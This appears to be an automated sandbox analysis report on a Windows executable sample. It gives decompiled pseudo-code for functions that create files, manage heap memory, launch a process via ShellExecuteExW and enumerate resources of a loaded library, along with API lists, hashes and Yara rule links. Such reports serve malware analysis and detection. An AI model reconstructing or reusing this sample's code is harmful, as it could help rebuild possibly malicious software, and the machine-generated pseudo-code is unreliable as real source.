                                                                                                                                                                      0x0040ab18
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ab18
                                                                                                                                                                      0x0040aaa2
                                                                                                                                                                      0x0040aaa2
                                                                                                                                                                      0x0040aaaa
                                                                                                                                                                      0x0040aaac
                                                                                                                                                                      0x0040aaac
                                                                                                                                                                      0x0040aab7
                                                                                                                                                                      0x0040aab9
                                                                                                                                                                      0x0040aab9
                                                                                                                                                                      0x0040aad1
                                                                                                                                                                      0x0040aad7
                                                                                                                                                                      0x0040ab8c
                                                                                                                                                                      0x0040ab8f
                                                                                                                                                                      0x0040ac2b
                                                                                                                                                                      0x0040ac2b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ab95
                                                                                                                                                                      0x0040ab95
                                                                                                                                                                      0x0040ab97
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ab9d
                                                                                                                                                                      0x0040ab9d
                                                                                                                                                                      0x0040aba4
                                                                                                                                                                      0x0040abc2
                                                                                                                                                                      0x0040abae
                                                                                                                                                                      0x0040abbd
                                                                                                                                                                      0x0040abbd
                                                                                                                                                                      0x0040abc5
                                                                                                                                                                      0x0040abc7
                                                                                                                                                                      0x0040abcc
                                                                                                                                                                      0x0040abd3
                                                                                                                                                                      0x0040abdd
                                                                                                                                                                      0x0040abe3
                                                                                                                                                                      0x0040abef
                                                                                                                                                                      0x0040abf2
                                                                                                                                                                      0x0040ac02
                                                                                                                                                                      0x0040ac0a
                                                                                                                                                                      0x0040ac0a
                                                                                                                                                                      0x0040ac10
                                                                                                                                                                      0x0040ac14
                                                                                                                                                                      0x0040ac19
                                                                                                                                                                      0x0040ac1b
                                                                                                                                                                      0x0040ac1b
                                                                                                                                                                      0x0040ac1f
                                                                                                                                                                      0x0040ac2f
                                                                                                                                                                      0x0040ac32
                                                                                                                                                                      0x0040ac34
                                                                                                                                                                      0x0040ac34
                                                                                                                                                                      0x0040ac3d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ac23
                                                                                                                                                                      0x0040ac2a
                                                                                                                                                                      0x0040ac2a
                                                                                                                                                                      0x0040ac1f
                                                                                                                                                                      0x0040ab97
                                                                                                                                                                      0x0040ab8f
                                                                                                                                                                      0x0040aaa0

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AAD1
                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AB12
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000001,00000000), ref: 0040AB5C
                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000001,00000000), ref: 0040AB7E
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000001,00000000), ref: 0040ABB7
                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC0A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Create$AllocHeapPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4207849991-0
                                                                                                                                                                      • Opcode ID: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
                                                                                                                                                                      • Instruction ID: 35cb0034da6faa60fecaa9fe6ab12df6337e8788845343623408397181d4bc5b
                                                                                                                                                                      • Opcode Fuzzy Hash: 03187de23769bf5a714144439e1d921a106fae5db2cc0e7624616ee37dc51610
                                                                                                                                                                      • Instruction Fuzzy Hash: E451B171204300ABE3218E28DC44B57BAE5EB44764F614A3AFA51A62E0D779EC55CB1E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D7B9, Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040D7B9(intOrPtr _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				intOrPtr _v0;
				signed char _t32;
				void* _t33;
				intOrPtr* _t41;
				intOrPtr _t47;
				signed int _t49;
				void* _t50;
				signed int _t52;
				signed int _t54;
				intOrPtr* _t55;
				void* _t56;
				signed int _t58;

				_t32 = _a16;
				_t50 = 4;
				_t49 = _a4 + _t50;
				_t54 = _t32 & 0x00000003;
				_t56 = 0;
				_t52 = _t49 & 0x00000003;
				if(_t52 != 0) {
					_t49 = _t49 + _t50;
				}
				if((_t32 & 0x00000004) == 0) {
					_t33 = RtlAllocateHeap( *0x417008, 0, 0x38); // executed
					_t56 = _t33;
					if(_t56 != 0) {
						 *((intOrPtr*)(_t56 + 0x14)) = _v0;
						 *((intOrPtr*)(_t56 + 0x18)) = _a4;
						 *_t56 = 0;
						 *((intOrPtr*)(_t56 + 4)) = 0;
						 *((intOrPtr*)(_t56 + 8)) = 0;
						 *(_t56 + 0x10) = _t49;
						if(_t54 == 1 || _t54 == 0) {
							 *((intOrPtr*)(_t56 + 0x1c)) = 1;
							_t31 = _t56 + 0x20; // 0x20
							InitializeCriticalSection(_t31);
						} else {
							 *((intOrPtr*)(_t56 + 0x1c)) = 0;
						}
					}
					goto L21;
				} else {
					E0040D9E3(_t50, 0x417614, E0040D982);
					EnterCriticalSection(0x41761c);
					_t41 =  *0x417618; // 0x2460fa8
					_t58 = _a8;
					while(_t41 != 0) {
						if( *((intOrPtr*)(_t41 + 0xc)) != _t49 ||  *((intOrPtr*)(_t41 + 0x10)) != _t58) {
							_t41 =  *_t41;
							continue;
						} else {
							 *((intOrPtr*)(_t41 + 0x14)) =  *((intOrPtr*)(_t41 + 0x14)) + 1;
							_t56 =  *(_t41 + 8);
							if(_t56 != 0) {
								L15:
								LeaveCriticalSection(0x41761c);
								L21:
								return _t56;
							}
							L10:
							_t55 = HeapAlloc( *0x417008, 0, 0x18);
							if(_t55 != 0) {
								_t12 = _t49 - 4; // -4
								_t56 = E0040D7B9(_t12, _a8, _a12, _t58 & 0xfffffffb);
								if(_t56 != 0) {
									_t47 =  *0x417618; // 0x2460fa8
									 *((intOrPtr*)(_t56 + 8)) = _t55;
									 *(_t55 + 4) =  *(_t55 + 4) & 0x00000000;
									 *(_t55 + 8) = _t56;
									 *(_t55 + 0xc) = _t49;
									 *(_t55 + 0x10) = _t58;
									 *((intOrPtr*)(_t55 + 0x14)) = 1;
									 *_t55 = _t47;
									if(_t47 != 0) {
										 *((intOrPtr*)(_t47 + 4)) = _t55;
									}
									 *0x417618 = _t55;
								}
							}
							goto L15;
						}
					}
					goto L10;
				}
			}















                                                                                                                                                                      0x0040d7b9
                                                                                                                                                                      0x0040d7c7
                                                                                                                                                                      0x0040d7c8
                                                                                                                                                                      0x0040d7d0
                                                                                                                                                                      0x0040d7d3
                                                                                                                                                                      0x0040d7d5
                                                                                                                                                                      0x0040d7d8
                                                                                                                                                                      0x0040d7dc
                                                                                                                                                                      0x0040d7dc
                                                                                                                                                                      0x0040d7e0
                                                                                                                                                                      0x0040d89b
                                                                                                                                                                      0x0040d8a1
                                                                                                                                                                      0x0040d8a5
                                                                                                                                                                      0x0040d8ab
                                                                                                                                                                      0x0040d8b2
                                                                                                                                                                      0x0040d8b8
                                                                                                                                                                      0x0040d8ba
                                                                                                                                                                      0x0040d8bd
                                                                                                                                                                      0x0040d8c0
                                                                                                                                                                      0x0040d8c5
                                                                                                                                                                      0x0040d8d0
                                                                                                                                                                      0x0040d8d3
                                                                                                                                                                      0x0040d8d7
                                                                                                                                                                      0x0040d8cb
                                                                                                                                                                      0x0040d8cb
                                                                                                                                                                      0x0040d8cb
                                                                                                                                                                      0x0040d8c5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d7e6
                                                                                                                                                                      0x0040d7f0
                                                                                                                                                                      0x0040d7fa
                                                                                                                                                                      0x0040d800
                                                                                                                                                                      0x0040d805
                                                                                                                                                                      0x0040d817
                                                                                                                                                                      0x0040d80e
                                                                                                                                                                      0x0040d815
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d81d
                                                                                                                                                                      0x0040d81d
                                                                                                                                                                      0x0040d820
                                                                                                                                                                      0x0040d825
                                                                                                                                                                      0x0040d885
                                                                                                                                                                      0x0040d88a
                                                                                                                                                                      0x0040d8de
                                                                                                                                                                      0x0040d8e3
                                                                                                                                                                      0x0040d8e3
                                                                                                                                                                      0x0040d827
                                                                                                                                                                      0x0040d837
                                                                                                                                                                      0x0040d83b
                                                                                                                                                                      0x0040d847
                                                                                                                                                                      0x0040d854
                                                                                                                                                                      0x0040d858
                                                                                                                                                                      0x0040d85a
                                                                                                                                                                      0x0040d85f
                                                                                                                                                                      0x0040d862
                                                                                                                                                                      0x0040d866
                                                                                                                                                                      0x0040d869
                                                                                                                                                                      0x0040d86c
                                                                                                                                                                      0x0040d86f
                                                                                                                                                                      0x0040d876
                                                                                                                                                                      0x0040d87a
                                                                                                                                                                      0x0040d87c
                                                                                                                                                                      0x0040d87c
                                                                                                                                                                      0x0040d87f
                                                                                                                                                                      0x0040d87f
                                                                                                                                                                      0x0040d858
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d83b
                                                                                                                                                                      0x0040d80e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d81b

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0041761C,00417614,0040D982,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D7FA
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D831
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0041761C,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D88A
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D89B
                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1272335518-0
                                                                                                                                                                      • Opcode ID: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
                                                                                                                                                                      • Instruction ID: 1c1621ef8b81eb37d3c39fa836f306ed5b79470d652240547c7f2301dbf87725
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ec9cf42e2d1736302ec14762d145b98cb1fe75a1bb67cb2000ecd2b7010510a
                                                                                                                                                                      • Instruction Fuzzy Hash: DE31A2B2D007019BC3209F99D844A57BBF4FB44760B15C53EE465A7390D738E908CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00402022, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                      			E00402022() {
				intOrPtr _t31;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				int _t39;
				int _t41;
				long _t43;
				void* _t51;
				intOrPtr* _t55;
				intOrPtr* _t57;

				_t51 = 0x14;
				do {
					_t57 = _t57 - 4;
					 *_t57 = 0;
					_t51 = _t51 - 1;
				} while (_t51 != 0);
				E0040DF60();
				E00405060(_t57,  *((intOrPtr*)(_t57 + 0x5c)));
				E00405060(_t57 + 4,  *((intOrPtr*)(_t57 + 0x60)));
				E00405060(_t57 + 8,  *((intOrPtr*)(_t57 + 0x64)));
				_t55 = _t57 + 0xc;
				 *_t55 = 0x3c;
				 *((intOrPtr*)(_t55 + 4)) = 0x140;
				 *((intOrPtr*)(_t55 + 0x1c)) = 0;
				_push(L"open");
				_pop(_t31);
				 *((intOrPtr*)(_t55 + 0xc)) = _t31;
				_t33 =  *_t57;
				 *((intOrPtr*)(_t55 + 0x10)) = _t33;
				_t35 =  *((intOrPtr*)(_t57 + 8));
				 *((intOrPtr*)(_t55 + 0x14)) = _t35;
				_t37 =  *((intOrPtr*)(_t57 + 4));
				 *((intOrPtr*)(_t55 + 0x18)) = _t37;
				_t39 = ShellExecuteExW(_t57 + 0xc); // executed
				 *(_t57 + 0x48) = _t39;
				while(1) {
					_push(0x19); // executed
					E00405532(); // executed
					_t41 = GetExitCodeProcess( *(_t57 + 0x48), _t57 + 0x4c); // executed
					if(_t41 != 0 &&  *(_t57 + 0x4c) != 0x103) {
						break;
					}
				}
				_t43 =  *(_t57 + 0x4c);
				return E0040DEF0(E0040DEF0(E0040DEF0(_t43,  *_t57),  *((intOrPtr*)(_t57 + 4))),  *((intOrPtr*)(_t57 + 8)));
			}













                                                                                                                                                                      0x00402024
                                                                                                                                                                      0x00402029
                                                                                                                                                                      0x00402029
                                                                                                                                                                      0x0040202c
                                                                                                                                                                      0x00402033
                                                                                                                                                                      0x00402033
                                                                                                                                                                      0x00402036
                                                                                                                                                                      0x00402042
                                                                                                                                                                      0x0040204f
                                                                                                                                                                      0x0040205c
                                                                                                                                                                      0x00402065
                                                                                                                                                                      0x00402069
                                                                                                                                                                      0x00402070
                                                                                                                                                                      0x00402077
                                                                                                                                                                      0x00402083
                                                                                                                                                                      0x00402084
                                                                                                                                                                      0x00402085
                                                                                                                                                                      0x0040208c
                                                                                                                                                                      0x0040208d
                                                                                                                                                                      0x00402095
                                                                                                                                                                      0x00402096
                                                                                                                                                                      0x0040209e
                                                                                                                                                                      0x0040209f
                                                                                                                                                                      0x004020a7
                                                                                                                                                                      0x004020ac
                                                                                                                                                                      0x004020b0
                                                                                                                                                                      0x004020b0
                                                                                                                                                                      0x004020b5
                                                                                                                                                                      0x004020c6
                                                                                                                                                                      0x004020cd
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004020dd
                                                                                                                                                                      0x004020df
                                                                                                                                                                      0x00402106

                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32 ref: 004020C6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CodeExecuteExitProcessShell
                                                                                                                                                                      • String ID: open
                                                                                                                                                                      • API String ID: 1016612177-2758837156
                                                                                                                                                                      • Opcode ID: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
                                                                                                                                                                      • Instruction ID: f63886f370766692049a8ab09fc70fe74b01992a8596c344147a8d3c31b217da
                                                                                                                                                                      • Opcode Fuzzy Hash: 4da19c96667bed9e9bef70d0c438878542b475c9845e05a44f1d331ba8485070
                                                                                                                                                                      • Instruction Fuzzy Hash: E9218971008309AFD700EF64C845A9FBBE9EF44308F10882EF198A6291DB79D905DB96
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401B8F, Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 44%
                                                                                                                                                                      			E00401B8F(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr __ebp;
				void* _t28;
				void* _t29;
				void* _t30;
				struct HINSTANCE__* _t33;
				void* _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				struct HINSTANCE__** _t56;
				void* _t57;

				_t57 = __eflags;
				_t51 = __edx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				E0040DF60();
				_t28 = E0040DE20();
				_t52 = _t51;
				_push(_t28);
				_push(2);
				_push(0);
				_t29 = E0040DE20();
				_t53 = _t52;
				_push(_t29);
				_t30 = E0040DE20();
				_t54 = _t53;
				E00405182(E00409638(_t57, _t30));
				 *_t56 =  *_t56 + _t54; // executed
				_t33 = LoadLibraryExW(??, ??, ??); // executed
				 *_t56 = E004051A0(_t33);
				EnumResourceTypesW(_t56[2], E00402109, 0);
				FreeLibrary( *_t56);
				if(E0040A3E3( *0x4170a8) <= 0) {
					goto L1;
				} else {
					__eax = E0040A3ED( *0x4170a8);
					while(1) {
						__eax = E0040A402( *0x4170a8);
						__eax = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							break;
						}
						__ebp =  *0x4170ac; // 0x0
						__edx =  *((intOrPtr*)(__ebp + 8));
						_push( *((intOrPtr*)(__ebp + 8)));
						__eax = E0040DE20();
						_pop(__edx);
						E0040DFC0(__edx) = __esp + 8;
						__eax = E0040DE60(__esp + 8, __esp + 8);
						__eax = E00405D80( *((intOrPtr*)(__esp + 4)));
						__eflags = __eax - 0xa;
						if(__eax <= 0xa) {
							__edx =  *((intOrPtr*)(__esp + 4));
							_push( *((intOrPtr*)(__esp + 4)));
							__eax = E0040DE20();
							_pop(__edx);
							E0040DFC0(__edx) = __esp + 0x10;
							__eax = E0040DE60(__esp + 0x10, __esp + 0x10);
						} else {
							__edx =  *((intOrPtr*)(__esp + 8));
							_push( *((intOrPtr*)(__esp + 8)));
							__eax = E0040DE20();
							_pop(__edx);
							__eax = E0040DFC0(__edx);
							__edx =  *((intOrPtr*)(__esp + 8));
							E0040DFC0( *((intOrPtr*)(__esp + 8))) = __esp + 0xc;
							__eax = E0040DE60(__esp + 0xc, __esp + 0xc);
						}
					}
					_push( *0x4170a8);
					__eax = E0040A436();
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					_push(1);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					E00405DB0( *((intOrPtr*)(__esp + 0x24))) = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					E0040D0A0() = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eax = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040DE60();
					__edx =  *((intOrPtr*)(__esp + 0x10));
					_push( *((intOrPtr*)(__esp + 0x10)));
					__eax = E0040DE20();
					_pop(__edx);
					E0040DFC0(__edx) = __esp + 0x18;
					__eax = E0040DE60(__esp + 0x18, __esp + 0x18); // executed
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					__eax = E00405182(__eax);
					 *__esp =  *__esp + __edx;
					__eflags =  *__esp;
					E00405E50(__ecx,  *__esp) = __esp + 0x14;
					_push(__esp + 0x14);
					__eax = E0040DE60();
					__eax = E0040DE20();
					__edx = __edx;
					_push(__eax);
					__eax = E0040DE20();
					__edx = __edx;
					E00405EC0(__eflags,  *((intOrPtr*)(__esp + 0x1c)), 0xa) = __esp + 0x14;
					__eax = E0040DE60(__esp + 0x14, __esp + 0x14);
					_push( *((intOrPtr*)(__esp + 0xc)));
					__edx =  *((intOrPtr*)(__esp + 0x14));
					_pop(__ecx);
					__eax = E00405120(__ecx, __edx);
					if(__eflags == 0) {
						L1:
						_push(0);
						L3();
						E0040DE00();
						HeapDestroy( *0x417008);
						ExitProcess(??);
						E00405379();
						E004098F0();
						E0040A655();
						E0040D264(E0040AA30());
						return E00409AD0();
					} else {
						__eax = E004097FE();
						__eax = __eax;
						__eflags = __eax;
						if(__eflags != 0) {
							__eax = E0040DE20();
							__edx = __edx;
							__eax = E0040DE20();
							__edx = __edx;
							__eax = E0040E020(__ecx);
							__edx =  *((intOrPtr*)(__esp + 0x18));
							__ecx = __eax;
							__ecx = E00405160(__ecx);
							__eax = E00405120(__eax, __edx);
							if(__eflags != 0) {
								 *0x417050 = 1;
								__eax = E0040DE20();
								__edx = __edx;
								_push(__eax);
								__eax = E0040DE20();
								__edx = __edx;
								__eax = 0x417020;
								_push(0x417020);
								__eax = E0040DE60();
							}
						}
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 4)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0xc)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 8)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0x14)));
						__eax = E0040DEF0(__eax,  *((intOrPtr*)(__esp + 0x10)));
						__esp = __esp + 0x18;
						_pop(__ebp);
						return __eax;
					}
				}
			}














                                                                                                                                                                      0x00401b8f
                                                                                                                                                                      0x00401b8f
                                                                                                                                                                      0x00401b93
                                                                                                                                                                      0x00401b94
                                                                                                                                                                      0x00401b95
                                                                                                                                                                      0x00401b96
                                                                                                                                                                      0x00401b97
                                                                                                                                                                      0x00401b98
                                                                                                                                                                      0x00401b99
                                                                                                                                                                      0x00401b9f
                                                                                                                                                                      0x00401ba4
                                                                                                                                                                      0x00401ba5
                                                                                                                                                                      0x00401ba6
                                                                                                                                                                      0x00401bab
                                                                                                                                                                      0x00401bb1
                                                                                                                                                                      0x00401bb6
                                                                                                                                                                      0x00401bb7
                                                                                                                                                                      0x00401bb9
                                                                                                                                                                      0x00401bbe
                                                                                                                                                                      0x00401bc5
                                                                                                                                                                      0x00401bca
                                                                                                                                                                      0x00401bcd
                                                                                                                                                                      0x00401bd7
                                                                                                                                                                      0x00401bea
                                                                                                                                                                      0x00401bf2
                                                                                                                                                                      0x00401c06
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c0c
                                                                                                                                                                      0x00401c12
                                                                                                                                                                      0x00401c17
                                                                                                                                                                      0x00401c1d
                                                                                                                                                                      0x00401c22
                                                                                                                                                                      0x00401c22
                                                                                                                                                                      0x00401c24
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00401c26
                                                                                                                                                                      0x00401c2c
                                                                                                                                                                      0x00401c2f
                                                                                                                                                                      0x00401c30
                                                                                                                                                                      0x00401c35
                                                                                                                                                                      0x00401c3d
                                                                                                                                                                      0x00401c42
                                                                                                                                                                      0x00401c4b
                                                                                                                                                                      0x00401c52
                                                                                                                                                                      0x00401c55
                                                                                                                                                                      0x00401c7f
                                                                                                                                                                      0x00401c83
                                                                                                                                                                      0x00401c84
                                                                                                                                                                      0x00401c89
                                                                                                                                                                      0x00401c91
                                                                                                                                                                      0x00401c96
                                                                                                                                                                      0x00401c57
                                                                                                                                                                      0x00401c57
                                                                                                                                                                      0x00401c5b
                                                                                                                                                                      0x00401c5c
                                                                                                                                                                      0x00401c61
                                                                                                                                                                      0x00401c64
                                                                                                                                                                      0x00401c69
                                                                                                                                                                      0x00401c73
                                                                                                                                                                      0x00401c78
                                                                                                                                                                      0x00401c78
                                                                                                                                                                      0x00401c9b
                                                                                                                                                                      0x00401ca0
                                                                                                                                                                      0x00401ca6
                                                                                                                                                                      0x00401cac
                                                                                                                                                                      0x00401cb1
                                                                                                                                                                      0x00401cb2
                                                                                                                                                                      0x00401cb4
                                                                                                                                                                      0x00401cb9
                                                                                                                                                                      0x00401cba
                                                                                                                                                                      0x00401cbc
                                                                                                                                                                      0x00401cc1
                                                                                                                                                                      0x00401cc2
                                                                                                                                                                      0x00401cc4
                                                                                                                                                                      0x00401cc9
                                                                                                                                                                      0x00401cca
                                                                                                                                                                      0x00401ccb
                                                                                                                                                                      0x00401cd1
                                                                                                                                                                      0x00401cd6
                                                                                                                                                                      0x00401cd7
                                                                                                                                                                      0x00401cd9
                                                                                                                                                                      0x00401cde
                                                                                                                                                                      0x00401ce9
                                                                                                                                                                      0x00401cee
                                                                                                                                                                      0x00401cf6
                                                                                                                                                                      0x00401cfb
                                                                                                                                                                      0x00401d03
                                                                                                                                                                      0x00401d07
                                                                                                                                                                      0x00401d08
                                                                                                                                                                      0x00401d0d
                                                                                                                                                                      0x00401d11
                                                                                                                                                                      0x00401d12
                                                                                                                                                                      0x00401d17
                                                                                                                                                                      0x00401d1f
                                                                                                                                                                      0x00401d24
                                                                                                                                                                      0x00401d2a
                                                                                                                                                                      0x00401d2f
                                                                                                                                                                      0x00401d30
                                                                                                                                                                      0x00401d32
                                                                                                                                                                      0x00401d37
                                                                                                                                                                      0x00401d38
                                                                                                                                                                      0x00401d3a
                                                                                                                                                                      0x00401d3f
                                                                                                                                                                      0x00401d40
                                                                                                                                                                      0x00401d42
                                                                                                                                                                      0x00401d47
                                                                                                                                                                      0x00401d57
                                                                                                                                                                      0x00401d5c
                                                                                                                                                                      0x00401d5c
                                                                                                                                                                      0x00401d64
                                                                                                                                                                      0x00401d68
                                                                                                                                                                      0x00401d69
                                                                                                                                                                      0x00401d6f
                                                                                                                                                                      0x00401d74
                                                                                                                                                                      0x00401d75
                                                                                                                                                                      0x00401d77
                                                                                                                                                                      0x00401d7c
                                                                                                                                                                      0x00401d8c
                                                                                                                                                                      0x00401d91
                                                                                                                                                                      0x00401d96
                                                                                                                                                                      0x00401d9a
                                                                                                                                                                      0x00401d9e
                                                                                                                                                                      0x00401d9f
                                                                                                                                                                      0x00401da4
                                                                                                                                                                      0x004011a0
                                                                                                                                                                      0x004011a0
                                                                                                                                                                      0x004011a5
                                                                                                                                                                      0x004011aa
                                                                                                                                                                      0x004011b5
                                                                                                                                                                      0x004011ba
                                                                                                                                                                      0x004011bf
                                                                                                                                                                      0x004011c4
                                                                                                                                                                      0x004011c9
                                                                                                                                                                      0x004011d3
                                                                                                                                                                      0x004011dd
                                                                                                                                                                      0x00401da6
                                                                                                                                                                      0x00401da6
                                                                                                                                                                      0x00401dab
                                                                                                                                                                      0x00401dab
                                                                                                                                                                      0x00401dad
                                                                                                                                                                      0x00401db0
                                                                                                                                                                      0x00401db5
                                                                                                                                                                      0x00401db8
                                                                                                                                                                      0x00401dbd
                                                                                                                                                                      0x00401dc9
                                                                                                                                                                      0x00401dce
                                                                                                                                                                      0x00401dd2
